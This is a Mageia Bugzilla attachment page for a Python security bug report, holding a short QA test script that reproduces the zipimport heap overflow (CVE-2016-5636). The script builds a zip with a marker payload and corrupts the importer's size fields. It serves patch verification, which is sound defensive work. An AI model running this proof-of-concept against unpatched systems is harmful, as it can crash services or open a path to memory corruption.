Mageia Bugzilla – Attachment 8000 Details for
Bug 18691
python/python3 new security issues CVE-2016-0772, CVE-2016-5636, CVE-2016-5699
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
Test script from Comment 2
crash.py (text/plain), 513 bytes, created by
Lewis Smith
on 2016-06-16 09:58:06 CEST
(
hide
)
Description:
Test script from Comment 2
Filename:
MIME Type:
Creator:
Lewis Smith
Created:
2016-06-16 09:58:06 CEST
Size:
513 bytes
patch
obsolete
>import zipimport >import zipfile >import struct >import sys >from signal import * > >FILE = 'payload' >ZIP = 'import.zip' > >payload = bytes() >with open(FILE, 'wb') as f: > payload = ("A" * 1000).encode('ascii') > payload += struct.pack('<Q', 0x41414141) > f.write(payload) > >zf = zipfile.PyZipFile(ZIP, mode='w') >zf.write(FILE) >zf.close() > >importer = zipimport.zipimporter(ZIP) >f = list(importer._files[FILE]) >f[1] = 1 # compress >f[2] = -1 # file size >importer._files[FILE] = tuple(f) >print(importer.get_data(FILE))
import zipimport import zipfile import struct import sys from signal import * FILE = 'payload' ZIP = 'import.zip' payload = bytes() with open(FILE, 'wb') as f: payload = ("A" * 1000).encode('ascii') payload += struct.pack('<Q', 0x41414141) f.write(payload) zf = zipfile.PyZipFile(ZIP, mode='w') zf.write(FILE) zf.close() importer = zipimport.zipimporter(ZIP) f = list(importer._files[FILE]) f[1] = 1 # compress f[2] = -1 # file size importer._files[FILE] = tuple(f) print(importer.get_data(FILE))
View Attachment As Raw
Actions:
View
Attachments on
bug 18691
: 8000